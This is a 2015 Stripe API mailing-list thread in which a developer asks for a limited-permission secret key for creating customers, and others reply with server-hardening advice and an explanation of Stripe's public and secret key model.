stripe.js Create Customer without Secret Key
480 views
Skip to first unread message
smutt00
Nov 26, 2015, 5:01:49 PM11/26/15
to Stripe API Discussion
This may already be possible. I'm not aware of any such method for doing this, but perhaps I've missed something.
When using stripe.js on a custom form, this generates a token for the submitted credit card data. It is then up to the back-end, where that form is submitted, to use that token to create a customer with the credit card data. Correct?
The only way to create a customer is by using the Secret API Key. This means that the Secret API Key would have to be placed on the server. Granted, the key would be embedded in back-end PHP code and would be difficult to expose, but the chance is still there. An exploited WordPress or Drupal script on the account, which allows a php shell to be uploaded, allowing the viewing of the Secret API Key. (Of course, not having an exploitable script on the web server would be ideal).
Would it be possible, or is it possible, to have a "Secret API Key" that's only function is to Create a Customer? I don't really like the idea of putting a "secret" key up on a public server, especially when that "secret" key can be used to run charges through our account. A dumbed down "secret" key that can only perform some functions (like creating a customer) would seem to be ideal. That way you can store the "real" Secret API Key on a restricted network and run charges on those Customers.
As is it right now, as I understand it, the only way to create a customer is to use the Secret API Key. The same Secret API Key that can be used to run charges on any customer. So if that Secret API Key is ever compromised, a lot of damage can be done. The chances of this Secret API Key being compromised are somewhat remote, but not 0. If I'm going to put a secret key out in the open, I would rather that it have limited access.
When using stripe.js on a custom form, this generates a token for the submitted credit card data. It is then up to the back-end, where that form is submitted, to use that token to create a customer with the credit card data. Correct?
The only way to create a customer is by using the Secret API Key. This means that the Secret API Key would have to be placed on the server. Granted, the key would be embedded in back-end PHP code and would be difficult to expose, but the chance is still there. An exploited WordPress or Drupal script on the account, which allows a php shell to be uploaded, allowing the viewing of the Secret API Key. (Of course, not having an exploitable script on the web server would be ideal).
Would it be possible, or is it possible, to have a "Secret API Key" that's only function is to Create a Customer? I don't really like the idea of putting a "secret" key up on a public server, especially when that "secret" key can be used to run charges through our account. A dumbed down "secret" key that can only perform some functions (like creating a customer) would seem to be ideal. That way you can store the "real" Secret API Key on a restricted network and run charges on those Customers.
As is it right now, as I understand it, the only way to create a customer is to use the Secret API Key. The same Secret API Key that can be used to run charges on any customer. So if that Secret API Key is ever compromised, a lot of damage can be done. The chances of this Secret API Key being compromised are somewhat remote, but not 0. If I'm going to put a secret key out in the open, I would rather that it have limited access.
Scott Fotheringham
Nov 27, 2015, 8:46:29 AM11/27/15
to Stripe API Discussion
I think you may be overthinking the security here. Realistically, what you're saying absolutely makes sense. But, the web server at some point needs to have in its position, the secret key. So no matter what you do to try and protect it, if someone got access to your web server, they've got the key anyway.
What you're better doing is focusing on protecting your web server. Ensure only a minimum amount of accounts with strong passwords, change the SSH port, restrict IP access to file transfer protocols, don't use basic FTP, use SFTP or SSH instead etc. You could even install some software that monitors connections and alerts you to intrusions. That way you can quickly refresh your keys from the stripe dashboard.
What you're better doing is focusing on protecting your web server. Ensure only a minimum amount of accounts with strong passwords, change the SSH port, restrict IP access to file transfer protocols, don't use basic FTP, use SFTP or SSH instead etc. You could even install some software that monitors connections and alerts you to intrusions. That way you can quickly refresh your keys from the stripe dashboard.
smutt00
Nov 27, 2015, 11:33:24 AM11/27/15
to Stripe API Discussion
The web server only really needs the secret key if it's going to run the charge. In my situation, it is not. Granted, I can certainly understand that my situation is likely not like 90% of transactions Stripe users out there do.
All I am interested in, is collecting the credit card information and storing that so that I can charge it later, from a much more isolated environment (no public inbound Internet access).
I'm a fan of least privileges. And in the situation I have described, the web server does not need privileges to run a charge. It only needs privileges to create a customer.
I do understand that the chances of a secret key being compromised in a well secured environment is very remote. But, the only way you are ever going to know that the secret key is compromised is after its been compromised, which is a bit too late.
I don't know how Stripe's server authentication systems work. I don't know if having a crippled key with access to specific functions is feasible or not, but it would seem to make sense.
All I am interested in, is collecting the credit card information and storing that so that I can charge it later, from a much more isolated environment (no public inbound Internet access).
I'm a fan of least privileges. And in the situation I have described, the web server does not need privileges to run a charge. It only needs privileges to create a customer.
I do understand that the chances of a secret key being compromised in a well secured environment is very remote. But, the only way you are ever going to know that the secret key is compromised is after its been compromised, which is a bit too late.
I don't know how Stripe's server authentication systems work. I don't know if having a crippled key with access to specific functions is feasible or not, but it would seem to make sense.
Matthew Arkin
Nov 27, 2015, 11:58:40 AM11/27/15
to Jake K.
Stripe only has public keys and secret keys, and you cannot limit the access of secret keys nor can you allow public keys to do more than just create card tokens. Its a feature I've requested a couple times, and I basically ended up building this for my users for Commencepayments.com
It is important to note that the issue with a compromised server is not that your key will be stolen, even if your API key is stolen, the amount of damage is pretty limited (if someone creates fraudulent charges you can always refund the charges, if customers get deleted they can potentially be undeleted through support). Ideally you'd be able to recognize that your key was compromised before anything too bad happens.
The big issue is that a malicious entity now has potentially unfettered access to your customer's card data, as access to your server means access to you HTML and they could now access that card data directly, arguably this is more valuable than your API key. This is what gets you into trouble.
Matt
--
You received this message because you are subscribed to the Google Groups "Stripe API Discussion" group.
To unsubscribe from this group and stop receiving emails from it, send an email to api-discuss...@lists.stripe.com.
To post to this group, send email to api-d...@lists.stripe.com.
Visit this group at http://groups.google.com/a/lists.stripe.com/group/api-discuss/.
Reply all
Reply to author
Forward
0 new messages